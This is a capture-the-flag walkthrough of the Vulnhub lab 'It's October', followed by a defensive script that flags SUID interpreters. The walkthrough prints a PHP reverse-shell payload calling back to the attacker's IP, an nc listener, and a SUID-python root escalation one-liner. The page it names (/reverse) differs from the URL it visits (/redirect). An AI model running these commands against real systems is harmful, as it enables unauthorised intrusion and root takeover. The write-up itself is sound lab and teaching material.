This time I’m doing It’s October from Vulnhub. After booting the VM I need to scan my subnet to find its address. I proceed with the usual nmap -n 192.168.56.101/24 to find out the box’s address.
After obtaining the address I run a more thorough scan with nmap -sV -sC 192.168.56.121, which highlights some interesting details:

As a first step I decide to take a look at the web server on port 80. The landing page is a well-presented website, so I open the developer console and check the source to see if I can discover something more interesting. At first glance it doesn’t look like WordPress, but it has to be some kind of CMS. The source reveals some interesting details; the theme used for this website is:

vojtasvoboda-newage, which after a quick Google search turns out to be a theme for OctoberCMS. At this point I backtracked to the other exposed web server on port 8080, which just exposes a notepad image:

But the developer tools reveal a more interesting find: there is a commented-out link to /mynote.txt which, upon visiting, leaks us some credentials:

At this point I attempt to use the credentials to connect to the machine via SSH, but apparently it is not that easy and I am greeted by a permission denied error:

My next guess is to try to access the MySQL service running remotely to create a backdoor via OUTFILE, but even this attempt failed, as it seems that the IP is blacklisted after the first connection attempt. The only option left now is to check how to access the admin panel of OctoberCMS and see if the credentials would work there.
Via the CMS documentation I learn that /backend/backend/auth/signin is the way to go and, finally, success: the credentials let me in. At this point my priority is to explore the admin panel to find a way of executing some code to get a shell on the server. The CMS tab seems to suit the purpose; it allows me to create a page with the browser editor:

Nice! Now, according to the documentation, I can just write a small payload that will give me a reverse shell when the /reverse page is opened:
function onStart() {
    $sock = fsockopen("192.168.56.101", 5555);
    $proc = proc_open("/bin/sh -i", array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
}

Now all that is left to do is open a listener on my attacking machine with nc -lvp 5555 and visit 192.168.56.121/redirect. Upon receiving a connection I upgrade the shell with python3 -c "import pty;pty.spawn('/bin/bash')". At this point we just need to find a way to escalate privileges.
I check sudo -l for some low-hanging fruit, but www-data cannot access sudo. My next step is to check if there is any interesting binary with SUID, so I run find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; which reveals:

Really interesting: python is running with SUID enabled. We can exploit that with a slight variation of the command that we used to upgrade the shell to obtain a root shell.
python3 -c "import os;import pty; os.setuid(0); pty.spawn('/bin/bash')"
Here, before spawning the shell, we set the process to run as root, which brings me to the end of this challenge:

Thanks to the creator of this challenge; it was easy but enjoyable. If you want to try it yourself here is the link
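
The SUID python finding above is the kind of misconfiguration a host audit should catch before an attacker does. The following is an added example, not part of the original write-up: a small audit script that walks a filesystem and flags root-owned SUID interpreters. The interpreter name list and severity labels are assumptions chosen for illustration, not an exhaustive policy.

```python
import os
import re
import stat

# Assumed, non-exhaustive list of interpreters and shells that should never
# carry the SUID bit; a trailing version suffix such as "3.8" is allowed.
INTERPRETER_RE = re.compile(
    r"^(python|perl|ruby|php|lua|node|bash|dash|zsh|ksh|sh|awk|gawk)[\d.]*$"
)

def classify(path, st_mode, st_uid):
    """Return a finding string for a risky root-owned SUID file, else None."""
    if not stat.S_ISREG(st_mode) or not st_mode & stat.S_ISUID:
        return None  # not a regular file, or SUID bit not set
    if st_uid != 0:
        return None  # SUID to a non-root owner is out of scope for this check
    if INTERPRETER_RE.match(os.path.basename(path)):
        # An interpreter keeps its effective UID, so any script it runs is root.
        return "CRITICAL: root-owned SUID interpreter"
    if st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "HIGH: root-owned SUID file writable by group/other"
    return None

def scan(root="/"):
    """Walk root and return a list of (path, finding) tuples."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # Skip pseudo filesystems that hold no real binaries.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: judge the real file, not a symlink
            except OSError:
                continue
            verdict = classify(path, st.st_mode, st.st_uid)
            if verdict:
                findings.append((path, verdict))
    return findings

if __name__ == "__main__":
    for path, verdict in scan("/"):
        print(f"{verdict}: {path}  (remediate with: chmod u-s {path})")
```

Because symlinks are not followed, the script reports the versioned binary that actually carries the bit rather than a python3 alias pointing at it.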